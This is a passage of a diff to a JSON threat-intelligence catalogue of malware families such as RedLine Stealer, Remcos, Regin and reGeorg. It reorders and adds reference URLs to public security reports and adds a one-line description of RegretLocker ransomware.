"https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/", - "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", - "https://www.jpcert.or.jp/magazine/acreport-redleaves.html", - "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", - "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", - "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", - "http://blog.macnica.net/blog/2017/12/post-8c22.html" + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", + "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", + "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://www.jpcert.or.jp/magazine/acreport-redleaves.html", + "http://blog.macnica.net/blog/2017/12/post-8c22.html", + "https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/" ], "synonyms": [ "BUGJUICE" @@ -40661,92 +42600,97 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer", - "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become", - "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html", - "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html", - "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware", - "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1", - "https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/", - "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle", - "https://unit42.paloaltonetworks.com/bluesky-ransomware/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", - "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html", - "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/", - "https://securityscorecard.pathfactory.com/all/a-detailed-analysis", - "https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer", - "https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer", - "https://unit42.paloaltonetworks.com/lapsus-group/", - "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", - "https://www.youtube.com/watch?v=NI_Yw2t9zoo", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://cyber-anubis.github.io/malware%20analysis/redline/", - "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", - "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service", - "https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/", - "https://ke-la.com/information-stealers-a-new-landscape/", - "https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://asec.ahnlab.com/en/35981/", - "https://securityscorecard.com/research/detailed-analysis-redline-stealer", - "https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/", - "https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/", - "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html", - "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", - "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two", - "https://dr4k0nia.github.io/posts/Unpacking-RedLine-Stealer/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://blog.netlab.360.com/purecrypter", - "https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software", - "https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/", - "https://intel471.com/blog/privateloader-malware", - "https://www.secureworks.com/research/darktortilla-malware-analysis", - "https://asec.ahnlab.com/ko/25837/", - "https://blog.avast.com/adobe-acrobat-sign-malware", - "https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf", - "https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/", - "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", - "https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904", - "https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/", - "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", - "https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer", - "https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/", - "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf", - "https://securelist.com/malvertising-through-search-engines/108996/", - "https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html", "https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer", + "https://cyber-anubis.github.io/malware%20analysis/redline/", + "https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/", + "https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer", + "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1", + "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns", "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/", - "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", - "https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload", - "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html", - "https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/", - "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", - "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://muha2xmad.github.io/malware-analysis/fullredline/", - "https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html", - "https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf", - "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign", - "https://asec.ahnlab.com/en/30445/", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", - "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882", + "https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", "https://blog.morphisec.com/syk-crypter-discord", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become", + "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two", + "https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/", + "https://unit42.paloaltonetworks.com/lapsus-group/", + "https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/", + "https://asec.ahnlab.com/ko/25837/", + "https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152", + "https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/", + "https://web.archive.org/web/20230606224056/https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152", + "https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer", + "https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", + "https://asec.ahnlab.com/en/30445/", + "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/", + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf", + "https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/", + "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/", + "https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat", + "https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html", + "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882", + "https://securityscorecard.pathfactory.com/all/a-detailed-analysis", + "https://ke-la.com/information-stealers-a-new-landscape/", + "https://www.secureworks.com/research/darktortilla-malware-analysis", + "https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/", + "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", "https://securityaffairs.co/wordpress/129391/hacking/lapsus-gang-compromised-microsoft-employees-account.html", + "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html", + "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware", + "https://intel471.com/blog/privateloader-malware", + "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/", + "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", + "https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software", + "https://unit42.paloaltonetworks.com/bluesky-ransomware/", + "https://muha2xmad.github.io/malware-analysis/fullredline/", + "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", + "https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/", + "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", + "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html", + "https://securityscorecard.com/research/detailed-analysis-redline-stealer", + "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html", + "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", + "https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/", + "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign", + "https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf", + "https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/", + "https://securelist.com/malvertising-through-search-engines/108996/", + "https://dr4k0nia.github.io/posts/Unpacking-RedLine-Stealer/", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service", + "https://www.secureworks.com/research/the-growing-threat-from-infostealers", "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md", + "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html", + "https://blog.netlab.360.com/purecrypter", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html", + "https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/", + "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", "https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md" + "https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904", + "https://asec.ahnlab.com/en/35981/", + "https://blog.avast.com/adobe-acrobat-sign-malware", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://www.youtube.com/watch?v=NI_Yw2t9zoo", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/", + "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf" ], "synonyms": [], "type": [] @@ -40805,8 +42749,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt", "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf", - "https://twitter.com/ItsReallyNick/status/1136502701301346305", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf" + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf", + "https://twitter.com/ItsReallyNick/status/1136502701301346305" ], "synonyms": [ "Dipsind" @@ -40821,8 +42765,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl", - "https://content.fireeye.com/apt/rpt-apt38", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" + "https://securelist.com/lazarus-under-the-hood/77908/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://content.fireeye.com/apt/rpt-apt38" ], "synonyms": [], "type": [] @@ -40874,13 +42820,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", - "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/", - "https://github.com/sensepost/reGeorg", - "https://sensepost.com/discover/tools/reGeorg/", "https://www.secureworks.com/blog/ransomware-deployed-by-adversary", "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF", "https://www.secureworks.com/research/samsam-ransomware-campaigns", - "https://www.welivesecurity.com/2022/09/06/worok-big-picture/" + "https://sensepost.com/discover/tools/reGeorg/", + "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/", + "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/", + "https://www.welivesecurity.com/2022/09/06/worok-big-picture/", + "https://github.com/sensepost/reGeorg" ], "synonyms": [], "type": [] @@ -40894,12 +42841,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", - "https://www.epicturla.com/previous-works/hitb2020-voltron-sta", - "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf", - "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf", "https://www.youtube.com/watch?v=jeLd-gw2bWo", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.epicturla.com/previous-works/hitb2020-voltron-sta", "https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/", + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf", "https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/" ], "synonyms": [], @@ -40909,13 +42856,13 @@ "value": "Regin" }, { - "description": "", + "description": "According to PCrisk, RegretLocker is malicious software classified as ransomware. Systems infected with this malware have their data encrypted and users receive ransom demands for decryption. During the encryption process, all affected files are appended with the \".mouse\" extension.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker", - "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/", + "https://twitter.com/malwrhunterteam/status/1321375502179905536", "https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/", - "https://twitter.com/malwrhunterteam/status/1321375502179905536" + "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/" ], "synonyms": [], "type": [] @@ -40943,8 +42890,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew", - "https://www.mandiant.com/resources/fin13-cybercriminal-mexico", - "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/" + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", + "https://www.mandiant.com/resources/fin13-cybercriminal-mexico" ], "synonyms": [ "tinyshell.win", @@ -41017,85 +42964,90 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", - "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", - "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", - "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", - "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", - "https://blog.morphisec.com/nft-malware-new-evasion-abilities", - "https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/", - "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", - "https://muha2xmad.github.io/unpacking/remcos/", - "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities", - "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "https://www.esentire.com/blog/remcos-rat", - "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html", - "https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain", - "https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/", - "https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/", - "https://secrary.com/ReversingMalware/RemcosRAT/", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/", - "https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/", - "https://muha2xmad.github.io/mal-document/remcosdoc/", - "https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly", - "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", - "http://malware-traffic-analysis.net/2017/12/22/index.html", - "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread", - "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://asec.ahnlab.com/en/32376/", - "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/", - "https://www.telsy.com/download/4832/", - "https://www.connectwise.com/resources/formbook-remcos-rat", - "https://intel471.com/blog/privateloader-malware", - "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", - "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", - "https://asec.ahnlab.com/ko/25837/", - "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", - "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", - "https://dissectingmalwa.re/malicious-ratatouille.html", - "https://asec.ahnlab.com/ko/32101/", - "https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing", - "https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html", - "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/", - "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf", - "https://news.sophos.com/en-us/2020/05/14/raticate/", - "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", - "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md", - "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://perception-point.io/behind-the-attack-remcos-rat/", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns", - "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", - "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", - "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", - "https://www.youtube.com/watch?v=DIH4SvKuktM", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html", + "https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/", "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", - "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", - "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers", - "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", - "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses", "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", + "https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/", + "https://www.telsy.com/download/4832/", + "https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD", + "https://www.jaiminton.com/reverse-engineering/remcos#", + "https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/", + 